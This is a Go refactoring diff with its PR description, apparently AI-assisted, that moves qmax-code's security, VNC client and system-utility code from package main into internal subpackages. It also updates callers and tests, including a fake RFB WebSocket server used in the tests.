+func LiveURLFilePath() string {
 	liveURLFileOnce.Do(func() {
 		home, err := os.UserHomeDir()
 		if err != nil {
@@ -61,7 +75,7 @@ func liveURLFilePath() string {
 // liveURLFileForChild returns the path that *this* qmax-code instance
 // will read from. In MCP subprocess mode that's whatever the parent
 // passed via QMAX_LIVE_URL_FILE; in standalone mode it's the same path
-// liveURLFilePath() chose for itself, but no one writes to it so reads
+// LiveURLFilePath() chose for itself, but no one writes to it so reads
 // are a no-op.
 func liveURLFileForChild() string {
 	if p := strings.TrimSpace(os.Getenv("QMAX_LIVE_URL_FILE")); p != "" {
@@ -70,12 +84,12 @@ func liveURLFileForChild() string {
 	return ""
 }
 
-// persistLiveURLForParent writes `url` into the side-channel file the
+// PersistLiveURLForParent writes `url` into the side-channel file the
 // parent watches. No-op when the env var isn't set (i.e. we're running
 // standalone, where captureLiveURL already wrote to sctx in-process).
 // Best-effort: errors are swallowed because failing here would corrupt
 // otherwise-valid tool output.
-func persistLiveURLForParent(url string) {
+func PersistLiveURLForParent(url string) {
 	path := liveURLFileForChild()
 	if path == "" || url == "" {
 		return
@@ -88,12 +102,12 @@ func persistLiveURLForParent(url string) {
 	_ = os.Rename(tmp, path)
 }
 
-// drainLiveURLFromChild reads any URL the subprocess wrote to the side
+// DrainLiveURLFromChild reads any URL the subprocess wrote to the side
 // channel since the last drain, then deletes the file so a stale URL
 // from a previous turn can't auto-launch on the next one. Returns ""
 // when the file is missing, empty, or unreadable.
-func drainLiveURLFromChild() string {
-	path := liveURLFilePath()
+func DrainLiveURLFromChild() string {
+	path := LiveURLFilePath()
 	if path == "" {
 		return ""
 	}
@@ -112,8 +126,8 @@ func drainLiveURLFromChild() string {
 // CheckTestStatus directly — without blocking the LLM tool call for the
 // 60–90 s E2B cold-start window.
 
-// execIDFilePath returns the per-process path for the execution-ID file.
-func execIDFilePath() string {
+// ExecIDFilePath returns the per-process path for the execution-ID file.
+func ExecIDFilePath() string {
 	execIDFileOnce.Do(func() {
 		home, err := os.UserHomeDir()
 		if err != nil {
@@ -132,10 +146,10 @@ func execIDFileForChild() string {
 	return strings.TrimSpace(os.Getenv("QMAX_EXEC_ID_FILE"))
 }
 
-// persistExecIDForParent writes the execution ID to the side channel so
+// PersistExecIDForParent writes the execution ID to the side channel so
 // the parent can poll for the live_browser_url without blocking the MCP
 // tool call. No-op when QMAX_EXEC_ID_FILE is not set.
-func persistExecIDForParent(execID string) {
+func PersistExecIDForParent(execID string) {
 	path := execIDFileForChild()
 	if path == "" || execID == "" {
 		return
@@ -147,10 +161,10 @@ func persistExecIDForParent(execID string) {
 	_ = os.Rename(tmp, path)
 }
 
-// drainExecIDFromChild reads and removes the execution ID the subprocess
+// DrainExecIDFromChild reads and removes the execution ID the subprocess
 // wrote. Returns "" when the file is missing or unreadable.
-func drainExecIDFromChild() string {
-	path := execIDFilePath()
+func DrainExecIDFromChild() string {
+	path := ExecIDFilePath()
 	if path == "" {
 		return ""
 	}

--- a/internal/sysutil/logging.go
+++ b/internal/sysutil/logging.go
@@ -1,4 +1,4 @@
-package main
+package sysutil
 
 import (
 	"crypto/rand"

--- a/internal/sysutil/pid_unix.go
+++ b/internal/sysutil/pid_unix.go
@@ -1,15 +1,15 @@
 //go:build !windows
 
-package main
+package sysutil
 
 import (
 	"os"
 	"syscall"
 )
 
-// pidAlive reports whether a process with the given PID is running.
+// PidAlive reports whether a process with the given PID is running.
 // Uses signal 0: no signal is sent but the kernel validates the PID.
-func pidAlive(pid int) bool {
+func PidAlive(pid int) bool {
 	p, err := os.FindProcess(pid)
 	if err != nil {
 		return false

--- a/internal/sysutil/pid_windows.go
+++ b/internal/sysutil/pid_windows.go
@@ -1,16 +1,16 @@
 //go:build windows
 
-package main
+package sysutil
 
 import (
 	"os"
 )
 
-// pidAlive reports whether a process with the given PID is running.
+// PidAlive reports whether a process with the given PID is running.
 // On Windows, OpenProcess is not directly accessible from pure Go without
 // cgo; os.FindProcess always succeeds, so we attempt a no-op signal as a
 // proxy. If the process handle is invalid the call errors out.
-func pidAlive(pid int) bool {
+func PidAlive(pid int) bool {
 	p, err := os.FindProcess(pid)
 	if err != nil {
 		return false

--- a/internal/vnc/stream.go
+++ b/internal/vnc/stream.go
@@ -1,4 +1,4 @@
-package main
+package vnc
 
 // Minimal RFB 3.8 client over WebSocket, tailored for QM Cloud Sandbox
 // noVNC endpoints. Decodes Raw + CopyRect into a 32-bit BGRX framebuffer
@@ -291,16 +291,16 @@ func (s *VNCStream) setPixelFormat() error {
 	buf := make([]byte, 20)
 	buf[0] = 0 // SetPixelFormat
 	// PixelFormat:
-	buf[4] = 32   // bits-per-pixel
-	buf[5] = 24   // depth
-	buf[6] = 0    // big-endian-flag (0 = little-endian)
-	buf[7] = 1    // true-colour-flag
-	binary.BigEndian.PutUint16(buf[8:10], 255)   // red-max
-	binary.BigEndian.PutUint16(buf[10:12], 255)  // green-max
-	binary.BigEndian.PutUint16(buf[12:14], 255)  // blue-max
-	buf[14] = 16 // red-shift
-	buf[15] = 8  // green-shift
-	buf[16] = 0  // blue-shift
+	buf[4] = 32                                 // bits-per-pixel
+	buf[5] = 24                                 // depth
+	buf[6] = 0                                  // big-endian-flag (0 = little-endian)
+	buf[7] = 1                                  // true-colour-flag
+	binary.BigEndian.PutUint16(buf[8:10], 255)  // red-max
+	binary.BigEndian.PutUint16(buf[10:12], 255) // green-max
+	binary.BigEndian.PutUint16(buf[12:14], 255) // blue-max
+	buf[14] = 16                                // red-shift
+	buf[15] = 8                                 // green-shift
+	buf[16] = 0                                 // blue-shift
 	// padding [17..19]
 	return s.write(buf)
 }

--- a/internal/vnc/stream_extra_test.go
+++ b/internal/vnc/stream_extra_test.go
@@ -1,4 +1,4 @@
-package main
+package vnc
 
 import (
 	"context"
@@ -92,10 +92,10 @@ func fakeRFBServer(t *testing.T) (*httptest.Server, string) {
 		_, _ = nc.Write([]byte("RFB 003.008\n")) // ProtocolVersion
 		clientVer := make([]byte, 12)
 		_, _ = nc.Read(clientVer)
-		_, _ = nc.Write([]byte{1, 1})            // 1 security type: None
-		_, _ = nc.Read(make([]byte, 1))          // client selects type 1
-		_, _ = nc.Write([]byte{0, 0, 0, 0})      // SecurityResult OK
-		_, _ = nc.Read(make([]byte, 1))          // ClientInit shared-flag
+		_, _ = nc.Write([]byte{1, 1})       // 1 security type: None
+		_, _ = nc.Read(make([]byte, 1))     // client selects type 1
+		_, _ = nc.Write([]byte{0, 0, 0, 0}) // SecurityResult OK
+		_, _ = nc.Read(make([]byte, 1))     // ClientInit shared-flag
 
 		// ServerInit: 24-byte header (width=800, height=600) + 0-length name
 		si := make([]byte, 24+4)
@@ -225,22 +225,4 @@ func TestVNCStreamCloseIdempotent(t *testing.T) {
 	}()
 	stream.Close()
 	stream.Close()
-}
-
-// ─── buildIndexMap edge cases ─────────────────────────────────────────────────
-
-func TestBuildIndexMapZeroDst(t *testing.T) {
-	m := buildIndexMap(100, 0)
-	if len(m) != 0 {
-		t.Errorf("zero dst: len = %d, want 0", len(m))
-	}
-}
-
-func TestBuildIndexMapSameSize(t *testing.T) {
-	m := buildIndexMap(5, 5)
-	for i, v := range m {
-		if v != i {
-			t.Errorf("same-size map[%d] = %d, want %d", i, v, i)
-		}
-	}
 }

--- a/internal/vnc/stream_test.go
+++ b/internal/vnc/stream_test.go
@@ -1,4 +1,4 @@
-package main
+package vnc
 
 import "testing"
 
@@ -37,31 +37,5 @@ func TestNormalizeNoVNCURLRejectsBadScheme(t *testing.T) {
 	_, err := normalizeNoVNCURL("ftp://example.com")
 	if err == nil {
 		t.Fatal("expected error on ftp scheme")
-	}
-}
-
-func TestBuildIndexMap(t *testing.T) {
-	m := buildIndexMap(100, 10)
-	if len(m) != 10 {
-		t.Fatalf("len = %d, want 10", len(m))
-	}
-	// First and last should land in source range, monotonically nondecreasing.
-	for i, v := range m {
-		if v < 0 || v >= 100 {
-			t.Errorf("m[%d] = %d out of range", i, v)
-		}
-		if i > 0 && v < m[i-1] {
-			t.Errorf("non-monotonic at %d: %d < %d", i, v, m[i-1])
-		}
-	}
-	// Upsampling: dst > src should still produce valid indices.
-	m = buildIndexMap(3, 9)
-	if len(m) != 9 {
-		t.Fatalf("len = %d, want 9", len(m))
-	}
-	for i, v := range m {
-		if v < 0 || v >= 3 {
-			t.Errorf("upsampled m[%d] = %d out of range", i, v)
-		}
 	}
 }

--- a/live_feed_extra_test.go
+++ b/live_feed_extra_test.go
@@ -2,6 +2,7 @@ package main
 
 import (
 	"context"
+	"encoding/binary"
 	"encoding/json"
 	"fmt"
 	"net/http"
@@ -11,6 +12,11 @@ import (
 	"sync/atomic"
 	"testing"
 	"time"
+
+	"github.com/coder/websocket"
+
+	"github.com/qualitymax/qmax-code/internal/sysutil"
+	"github.com/qualitymax/qmax-code/internal/vnc"
 )
 
 // ─── annotateWithClientNote ───────────────────────────────────────────────────
@@ -135,13 +141,13 @@ func TestCaptureLiveURLOnlyLogsFirstStatus(t *testing.T) {
 // ─── drainLiveURLFromChild / persistLiveURLForParent round-trip ──────────────
 
 func TestPersistAndDrainLiveURL(t *testing.T) {
-	// Reset the singleton so liveURLFilePath() recomputes on next call.
+	// Reset the singleton so sysutil.LiveURLFilePath() recomputes on next call.
 	resetLiveURLFileForTest()
 
-	// liveURLFilePath() is the parent-side path (computed once via sync.Once).
+	// sysutil.LiveURLFilePath() is the parent-side path (computed once via sync.Once).
 	// cc_agent.go sets QMAX_LIVE_URL_FILE to this same path so the child
 	// (MCP subprocess) knows where to write. Replicate that setup here.
-	parentPath := liveURLFilePath()
+	parentPath := sysutil.LiveURLFilePath()
 	if parentPath == "" {
 		t.Skip("no home directory available")
 	}
@@ -149,14 +155,14 @@ func TestPersistAndDrainLiveURL(t *testing.T) {
 	t.Setenv("QMAX_LIVE_URL_FILE", parentPath)
 
 	want := "https://6080-test.e2b.app/vnc.html"
-	persistLiveURLForParent(want) // child writes to QMAX_LIVE_URL_FILE path
+	sysutil.PersistLiveURLForParent(want) // child writes to QMAX_LIVE_URL_FILE path
 
-	got := drainLiveURLFromChild() // parent reads from liveURLFilePath()
+	got := sysutil.DrainLiveURLFromChild() // parent reads from sysutil.LiveURLFilePath()
 	if got != want {
 		t.Errorf("drain = %q, want %q", got, want)
 	}
 	// Second drain → empty (file was removed after first read).
-	if second := drainLiveURLFromChild(); second != "" {
+	if second := sysutil.DrainLiveURLFromChild(); second != "" {
 		t.Errorf("second drain should be empty, got %q", second)
 	}
 }
@@ -164,14 +170,14 @@ func TestPersistAndDrainLiveURL(t *testing.T) {
 func TestPersistLiveURLNoopWhenEnvUnset(t *testing.T) {
 	t.Setenv("QMAX_LIVE_URL_FILE", "")
 	// Must not panic or create any file.
-	persistLiveURLForParent("https://host/vnc.html")
+	sysutil.PersistLiveURLForParent("https://host/vnc.html")
 }
 
 func TestDrainLiveURLFromChildMissingFile(t *testing.T) {
 	resetLiveURLFileForTest()
 	t.Setenv("QMAX_LIVE_URL_FILE", "")
 	// The parent-side path doesn't exist yet → should return "".
-	got := drainLiveURLFromChild()
+	got := sysutil.DrainLiveURLFromChild()
 	if got != "" {
 		t.Errorf("missing file should return empty, got %q", got)
 	}
@@ -182,7 +188,7 @@ func TestDrainLiveURLFromChildMissingFile(t *testing.T) {
 func TestPersistAndDrainExecID(t *testing.T) {
 	resetExecIDFileForTest()
 
-	parentPath := execIDFilePath()
+	parentPath := sysutil.ExecIDFilePath()
 	if parentPath == "" {
 		t.Skip("no home directory available")
 	}
@@ -190,14 +196,14 @@ func TestPersistAndDrainExecID(t *testing.T) {
 	t.Setenv("QMAX_EXEC_ID_FILE", parentPath)
 
 	want := "exec_6120_1778065167"
-	persistExecIDForParent(want)
+	sysutil.PersistExecIDForParent(want)
 
-	got := drainExecIDFromChild()
+	got := sysutil.DrainExecIDFromChild()
 	if got != want {
 		t.Errorf("drain = %q, want %q", got, want)
 	}
 	// Second drain → empty (file was removed).
-	if second := drainExecIDFromChild(); second != "" {
+	if second := sysutil.DrainExecIDFromChild(); second != "" {
 		t.Errorf("second drain should be empty, got %q", second)
 	}
 }
@@ -205,13 +211,13 @@ func TestPersistAndDrainExecID(t *testing.T) {
 func TestPersistExecIDNoopWhenEnvUnset(t *testing.T) {
 	t.Setenv("QMAX_EXEC_ID_FILE", "")
 	// Must not panic or create any file.
-	persistExecIDForParent("exec_abc_123")
+	sysutil.PersistExecIDForParent("exec_abc_123")
 }
 
 func TestDrainExecIDFromChildMissingFile(t *testing.T) {
 	resetExecIDFileForTest()
 	// The parent-side path doesn't exist yet → should return "".
-	got := drainExecIDFromChild()
+	got := sysutil.DrainExecIDFromChild()
 	if got != "" {
 		t.Errorf("missing file should return empty, got %q", got)
 	}
@@ -224,7 +230,7 @@ func TestMaybeLaunchLiveFeedLiveFeedOff(t *testing.T) {
 	srv, wsURL := fakeRFBServerForFeed(t)
 	defer srv.Close()
 
-	stream, err := DialVNC(context.Background(), wsURL, 1)
+	stream, err := vnc.DialVNC(context.Background(), wsURL, 1)
 	if err != nil {
 		t.Fatalf("DialVNC: %v", err)
 	}
@@ -261,11 +267,47 @@ func TestMaybeLaunchLiveFeedNilSctx(t *testing.T) {
 
 // ─── runTestWithProgress early-return when LiveFeed + URL captured ────────────
 
-// fakeRFBServerForFeed is the same as fakeRFBServer (defined in
-// vnc_stream_extra_test.go) but package-visible alias for this file.
-func fakeRFBServerForFeed(t *testing.T) (interface{ Close() }, string) {
+// fakeRFBServerForFeed mirrors the helper in internal/vnc tests. We can't
+// reach into that package's test-only symbols from here, so we duplicate the
+// minimal RFB handshake. Kept self-contained for the same reason.
+func fakeRFBServerForFeed(t *testing.T) (*httptest.Server, string) {
 	t.Helper()
-	return fakeRFBServer(t)
+	mux := http.NewServeMux()
+	mux.HandleFunc("/websockify", func(w http.ResponseWriter, r *http.Request) {
+		conn, err := websocket.Accept(w, r, &websocket.AcceptOptions{
+			Subprotocols:       []string{"binary"},
+			InsecureSkipVerify: true,
+		})
+		if err != nil {
+			return
+		}
+		defer conn.Close(websocket.StatusNormalClosure, "")
+		nc := websocket.NetConn(r.Context(), conn, websocket.MessageBinary)
+
+		_, _ = nc.Write([]byte("RFB 003.008\n"))
+		_, _ = nc.Read(make([]byte, 12))
+		_, _ = nc.Write([]byte{1, 1})
+		_, _ = nc.Read(make([]byte, 1))
+		_, _ = nc.Write([]byte{0, 0, 0, 0})
+		_, _ = nc.Read(make([]byte, 1))
+
+		si := make([]byte, 24+4)
+		binary.BigEndian.PutUint16(si[0:], 800)
+		binary.BigEndian.PutUint16(si[2:], 600)
+		binary.BigEndian.PutUint32(si[20:], 0)
+		_, _ = nc.Write(si)
+
+		buf := make([]byte, 4096)
+		for {
+			if _, err := nc.Read(buf); err != nil {
+				return
+			}
+		}
+	})
+
+	srv := httptest.NewServer(mux)
+	wsURL := "ws://" + srv.Listener.Addr().String() + "/websockify"
+	return srv, wsURL
 }
 
 // TestAnnotatePreservesExecutionID verifies the execution_id survives round-trip.
@@ -360,7 +402,7 @@ func TestWaitForLiveFeedURLTimeout(t *testing.T) {
 func TestRunTestWithProgressLiveFeedFastReturn(t *testing.T) {
 	resetExecIDFileForTest()
 
-	parentPath := execIDFilePath()
+	parentPath := sysutil.ExecIDFilePath()
 	if parentPath == "" {
 		t.Skip("no home directory")
 	}
@@ -388,7 +430,7 @@ func TestRunTestWithProgressLiveFeedFastReturn(t *testing.T) {
 	}
 
 	// execID must be persisted in the side-channel file.
-	got := drainExecIDFromChild()
+	got := sysutil.DrainExecIDFromChild()
 	if got != "exec_fast_123" {
 		t.Errorf("side-channel execID = %q, want exec_fast_123", got)
 	}

--- a/main.go
+++ b/main.go
@@ -12,6 +12,9 @@ import (
 	"sync"
 	"syscall"
 	"time"
+
+	"github.com/qualitymax/qmax-code/internal/sysutil"
+	"github.com/qualitymax/qmax-code/internal/vnc"
 )
 
 // Version is set at build time via -ldflags "-X main.Version=x.y.z"
@@ -42,9 +45,9 @@ func main() {
 	}
 
 	// Initialize error reporting only when explicitly enabled.
-	InitErrorReporting()
-	defer FlushErrorReporting()
-	defer RecoverPanic()
+	sysutil.InitErrorReporting(Version)
+	defer sysutil.FlushErrorReporting()
+	defer sysutil.RecoverPanic()
 
 	// Handle "serve --mcp" subcommand: start MCP server for Claude Code integration.
 	// CC spawns this automatically when qmax-code is listed as an MCP server.
@@ -414,7 +417,7 @@ func runREPL(agent *Agent, cliAgent CLIAgent, quietMode bool) {
 	sessionID := generateSessionID()
 
 	// Initialize structured logger
-	agent.logger = NewLogger(sessionID)
+	agent.logger = sysutil.NewLogger(sessionID)
 	defer agent.logger.Close()
 
 	// Cloud session tracking — created once when projectID is known.
@@ -1125,7 +1128,7 @@ func runREPL(agent *Agent, cliAgent CLIAgent, quietMode bool) {
 		// available after the agent turn ends even without server-side keepalive.
 		type preConnResult struct {
 			url    string
-			stream *VNCStream // nil on dial failure
+			stream *vnc.VNCStream // nil on dial failure
 		}
 		preConnChan := make(chan preConnResult, 1)
 		// watchCtx is only used to stop the polling ticker (abort a pending
@@ -1146,14 +1149,14 @@ func runREPL(agent *Agent, cliAgent CLIAgent, quietMode bool) {
 					case <-watchCtx.Done():
 						return
 					case <-ticker.C:
-						url := drainLiveURLFromChild()
+						url := sysutil.DrainLiveURLFromChild()
 						if url == "" {
 							continue
 						}
 						// Use context.Background() so the stream's lifetime is
 						// NOT tied to watchCtx. Cancelling watchCtx (at end of
 						// turn) must not kill an already-established connection.
-						stream, dialErr := DialVNC(context.Background(), url, 10)
+						stream, dialErr := vnc.DialVNC(context.Background(), url, 10)
 						res := preConnResult{url: url}
 						if dialErr == nil {
 							res.stream = stream
@@ -1221,7 +1224,7 @@ func runREPL(agent *Agent, cliAgent CLIAgent, quietMode bool) {
 			if cliAgent != nil {
 				backendTag = agent.config.Context.Backend
 			}
-			CaptureError(err, map[string]interface{}{
+			sysutil.CaptureError(err, map[string]interface{}{
 				"backend":     backendTag,
 				"input_len":   fmt.Sprintf("%d", len(input)),
 				"image_count": fmt.Sprintf("%d", len(images)),
@@ -1254,7 +1257,7 @@ func runREPL(agent *Agent, cliAgent CLIAgent, quietMode bool) {
 			if preConn.url != "" {
 				agent.config.Context.LastLiveURL = preConn.url
 				agent.config.Context.sandboxModeLogged = true
-			} else if url := drainLiveURLFromChild(); url != "" {
+			} else if url := sysutil.DrainLiveURLFromChild(); url != "" {
 				agent.config.Context.LastLiveURL = url
 				agent.config.Context.sandboxModeLogged = true
 			}
@@ -1262,7 +1265,7 @@ func runREPL(agent *Agent, cliAgent CLIAgent, quietMode bool) {
 
 		// Check whether run_test returned early and wrote an execution_id for
 		// us to poll directly (fast-return path, avoids 60–90s LLM block).
-		pendingExecID := drainExecIDFromChild()
+		pendingExecID := sysutil.DrainExecIDFromChild()
 
 		// End-of-turn live-feed auto-launch. If a tool call surfaced a
 		// live_browser_url during this turn (and the user opted in via
@@ -1282,7 +1285,7 @@ func runREPL(agent *Agent, cliAgent CLIAgent, quietMode bool) {
 //
 // Idempotent: no-op when LiveFeed is off. Clears LastLiveURL on success so
 // a stale URL from a previous run doesn't auto-launch on the next turn.
-func maybeLaunchLiveFeed(sctx *SessionContext, term *Terminal, preStream *VNCStream, pendingExecID string) {
+func maybeLaunchLiveFeed(sctx *SessionContext, term *Terminal, preStream *vnc.VNCStream, pendingExecID string) {
 	if sctx == nil || !sctx.LiveFeed {
 		if preStream != nil {
 			preStream.Close()
@@ -1336,7 +1339,7 @@ func maybeLaunchLiveFeed(sctx *SessionContext, term *Terminal, preStream *VNCStr
 	stream := preStream
 	if stream == nil {
 		var dialErr error
-		stream, dialErr = DialVNC(context.Background(), url, 10)
+		stream, dialErr = vnc.DialVNC(context.Background(), url, 10)
 		if dialErr != nil {
 			term.PrintError(fmt.Sprintf("browserfeed: connect: %v", dialErr))
 			sctx.LastLiveURL = url

--- a/mcp_reconnect_test.go
+++ b/mcp_reconnect_test.go
@@ -4,8 +4,9 @@ import (
 	"os"
 	"path/filepath"
 	"strings"
-	"sync"
 	"testing"
+
+	"github.com/qualitymax/qmax-code/internal/sysutil"
 )
 
 func TestCodexRunRestoresMCPConfigBeforeExec(t *testing.T) {
@@ -99,11 +100,9 @@ func writeFakeCLI(t *testing.T, name, body string) string {
 }
 
 func resetLiveURLFileForTest() {
-	liveURLFileOnce = sync.Once{}
-	liveURLFileVal = ""
+	sysutil.ResetLiveURLFileForTest()
 }
 
 func resetExecIDFileForTest() {
-	execIDFileOnce = sync.Once{}
-	execIDFileVal = ""
+	sysutil.ResetExecIDFileForTest()
 }

--- a/tools.go
+++ b/tools.go
@@ -15,6 +15,9 @@ import (
 	"strconv"
 	"strings"
 	"time"
+
+	"github.com/qualitymax/qmax-code/internal/security"
+	"github.com/qualitymax/qmax-code/internal/sysutil"
 )
 
 // limitWriter is an io.Writer that silently discards bytes once the cap is hit.
@@ -133,7 +136,7 @@ var experimentalToolNames = map[string]bool{
 // QMAX_EXPERIMENTAL=1 is set.
 func BuildToolDefs() []ToolDef {
 	all := buildAllToolDefs()
-	if envEnabled("QMAX_EXPERIMENTAL") {
+	if sysutil.EnvEnabled("QMAX_EXPERIMENTAL") {
 		return all
 	}
 	out := make([]ToolDef, 0, len(all))
@@ -765,7 +768,7 @@ func executeToolViaAPI(name string, rawInput interface{}, sctx *SessionContext, 
 		if code == "" {
 			code = strVal(input, "content")
 		}
-		if violations := scanCodeSecurity(code); len(violations) > 0 {
+		if violations := security.ScanCode(code); len(violations) > 0 {
 			return fmt.Sprintf(`{"error": "Security scan failed", "violations": %q}`, strings.Join(violations, "; "))
 		}
 		scriptID := intVal(input, "script_id", 0)
@@ -882,7 +885,7 @@ func runTestWithProgress(ctx context.Context, api *APIClient, sctx *SessionConte
 	// drains the execID from the side-channel file and polls CheckTestStatus
 	// directly (see waitForLiveFeedURL in main.go).
 	if sctx != nil && sctx.LiveFeed {
-		persistExecIDForParent(execID)
+		sysutil.PersistExecIDForParent(execID)
 		return annotateWithClientNote(raw,
 			fmt.Sprintf("Test started (execution_id: %s). "+
 				"The live browser feed will open automatically when the sandbox is ready — "+
@@ -1050,7 +1053,7 @@ func captureLiveURL(sctx *SessionContext, raw string) {
 	// REPL's auto-launcher would never see it. Persist via the side
 	// channel set up in writeMCPConfig (cc_agent / codex_agent). No-op
 	// when QMAX_LIVE_URL_FILE isn't set (standalone mode).
-	persistLiveURLForParent(url)
+	sysutil.PersistLiveURLForParent(url)
 	if sctx.LiveFeed && !sctx.liveURLLogged {
 		fmt.Fprintln(os.Stderr, "\033[36m[live]\033[0m live_browser_url captured — auto-launch fires at end of turn")
 		sctx.liveURLLogged = true
@@ -1208,9 +1211,9 @@ func runLocalTest(ctx context.Context, sctx *SessionContext, scriptID int, baseU
 
 	// 4. Build result
 	passed := runErr == nil
-	output := redactSensitive(stdout.String())
+	output := security.RedactSensitive(stdout.String())
 	if stderr.n > 0 {
-		output += "\n--- stderr ---\n" + redactSensitive(stderr.String())
+		output += "\n--- stderr ---\n" + security.RedactSensitive(stderr.String())
 	}
 
 	// Trim output if too long (display budget)
@@ -1391,7 +1394,7 @@ func executeToolViaQMax(name string, rawInput interface{}, sctx *SessionContext,
 
 	case "run_command":
 		cmd := fmt.Sprintf("%v", input["command"])
-		if violation := validateCommand(cmd); violation != "" {
+		if violation := security.ValidateCommand(cmd); violation != "" {
 			return fmt.Sprintf(`{"error": "Command blocked: %s"}`, violation)
 		}
 		return runShell(ctx, "sh", "-c", cmd)
@@ -1429,7 +1432,7 @@ func executeToolViaQMax(name string, rawInput interface{}, sctx *SessionContext,
 		}
 
 		// Security scan before saving
-		if violations := scanCodeSecurity(code); len(violations) > 0 {
+		if violations := security.ScanCode(code); len(violations) > 0 {
 			return fmt.Sprintf(`{"error": "Security scan failed", "violations": %q}`, strings.Join(violations, "; "))
 		}
 
@@ -1467,14 +1470,14 @@ func runQMax(sctx *SessionContext, ctx context.Context, args ...string) string {
 			return `{"error": "cancelled"}`
 		}
 		if stderr.n > 0 {
-			return fmt.Sprintf(`{"error": %q}`, redactSensitive(stderr.String()))
+			return fmt.Sprintf(`{"error": %q}`, security.RedactSensitive(stderr.String()))
 		}
-		return fmt.Sprintf(`{"error": %q}`, redactSensitive(err.Error()))
+		return fmt.Sprintf(`{"error": %q}`, security.RedactSensitive(err.Error()))
 	}
 
-	output := strings.TrimSpace(redactSensitive(stdout.String()))
+	output := strings.TrimSpace(security.RedactSensitive(stdout.String()))
 	if output == "" {
-		output = strings.TrimSpace(redactSensitive(stderr.String()))
+		output = strings.TrimSpace(security.RedactSensitive(stderr.String()))
 	}
 	return output
 }
@@ -1493,12 +1496,12 @@ func runShell(ctx context.Context, name string, args ...string) string {
 		}
 		combined := stdout.String() + stderr.String()
 		if combined != "" {
-			return redactSensitive(combined)
+			return security.RedactSensitive(combined)
 		}
-		return fmt.Sprintf(`{"error": %q}`, redactSensitive(err.Error()))
+		return fmt.Sprintf(`{"error": %q}`, security.RedactSensitive(err.Error()))
 	}
 
-	return redactSensitive(stdout.String())
+	return security.RedactSensitive(stdout.String())
 }
 
 // extractPlaywrightError parses Playwright test output and extracts the actual error
@@ -2132,20 +2135,20 @@ func fetchScriptCode(sctx *SessionContext, ctx context.Context, scriptID string)
 	url := fmt.Sprintf("%s/api/automation/scripts/%s", apiURL, scriptID)
 	req, err := http.NewRequestWithContext(ctx, "GET", url, nil)
 	if err != nil {
-		return fmt.Sprintf(`{"error": %q}`, redactSensitive(err.Error()))
+		return fmt.Sprintf(`{"error": %q}`, security.RedactSensitive(err.Error()))
 	}
 	req.Header.Set("Authorization", "Bearer "+token)
 
 	client := &http.Client{Timeout: 30 * time.Second}
 	resp, err := client.Do(req)
 	if err != nil {
-		return fmt.Sprintf(`{"error": %q}`, redactSensitive(err.Error()))
+		return fmt.Sprintf(`{"error": %q}`, security.RedactSensitive(err.Error()))
 	}
 	defer resp.Body.Close()
 
 	body, _ := io.ReadAll(io.LimitReader(resp.Body, 1024*1024))
 	if resp.StatusCode != 200 {
-		return fmt.Sprintf(`{"error": "HTTP %d: %s"}`, resp.StatusCode, redactSensitive(string(body)))
+		return fmt.Sprintf(`{"error": "HTTP %d: %s"}`, resp.StatusCode, security.RedactSensitive(string(body)))
 	}
 	return string(body)
 }
@@ -2166,7 +2169,7 @@ func updateScriptCode(sctx *SessionContext, ctx context.Context, scriptID, name,
 
 	req, err := http.NewRequestWithContext(ctx, "PUT", url, bytes.NewReader(payload))
 	if err != nil {
-		return fmt.Sprintf(`{"error": %q}`, redactSensitive(err.Error()))
+		return fmt.Sprintf(`{"error": %q}`, security.RedactSensitive(err.Error()))
 	}
 	req.Header.Set("Authorization", "Bearer "+token)
 	req.Header.Set("Content-Type", "application/json")
@@ -2174,13 +2177,13 @@ func updateScriptCode(sctx *SessionContext, ctx context.Context, scriptID, name,
 	client := &http.Client{Timeout: 30 * time.Second}
 	resp, err := client.Do(req)
 	if err != nil {
-		return fmt.Sprintf(`{"error": %q}`, redactSensitive(err.Error()))
+		return fmt.Sprintf(`{"error": %q}`, security.RedactSensitive(err.Error()))
 	}
 	defer resp.Body.Close()
 
 	body, _ := io.ReadAll(io.LimitReader(resp.Body, 1024*1024))
 	if resp.StatusCode != 200 {
-		return fmt.Sprintf(`{"error": "HTTP %d: %s"}`, resp.StatusCode, redactSensitive(string(body)))
+		return fmt.Sprintf(`{"error": "HTTP %d: %s"}`, resp.StatusCode, security.RedactSensitive(string(body)))
 	}
 	return string(body)
 }
@@ -2517,7 +2520,7 @@ func callVisionAnalysis(sctx *SessionContext, imageURL, prompt string) string {
 
 	respData, _ := io.ReadAll(resp.Body)
 	if resp.StatusCode != 200 {
-		return jsonError(fmt.Sprintf("Vision API error %d: %s", resp.StatusCode, redactSensitive(string(respData))))
+		return jsonError(fmt.Sprintf("Vision API error %d: %s", resp.StatusCode, security.RedactSensitive(string(respData))))
 	}
 
 	var result map[string]interface{}


### PR DESCRIPTION
## Summary

Phase 1 of organizing qmax-code's flat `package main` (~70 .go files at the repo root) into subpackages. Three self-contained leaf subsystems extracted:

- **`internal/security`** — code-safety scanner, command allowlist, credential redactor (`scanCodeSecurity` → `ScanCode`, `parseQmaxAllows` → `ParseAllows`, others capitalized).
- **`internal/vnc`** — RFB/noVNC client used by `/browserfeed` and the live-feed launcher. `buildIndexMap` tests moved to live with their impl in `cmd_browserfeed_test.go`.
- **`internal/sysutil`** — `Logger`, error reporting, `pidAlive`, and the parent/child file-IPC for live URL + execID. `InitErrorReporting` now takes a `version string` parameter instead of reaching into `main.Version`. Test-only reset hooks (`ResetLiveURLFileForTest` / `ResetExecIDFileForTest`) are exported so tests in `main` can drive them.

## What's NOT in this PR

The bigger packages (`agent`, `tui`, `api`, `session`, `tools`, `mcp`, plus a new `core` for shared types) still live in `package main`. Extracting them requires first introducing `internal/core` to break the cycle between `agent ↔ tools ↔ session ↔ tui` (all share `SessionContext`, `Message`, `ContentBlock`, `TokenUsage`). That single move touches ~50 files at once. Doing it in a follow-up keeps this PR reviewable.

## Test plan

- [x] `go build ./...`
- [x] `go test ./...` — all packages green
- [x] `gofmt` clean for new files (pre-existing unformatted files in `package main` left untouched)
- [ ] Smoke test: launch qmax-code REPL locally
- [ ] Smoke test: run `/browserfeed` against a sandbox

🤖 Generated with [Claude Code](https://claude.com/claude-code)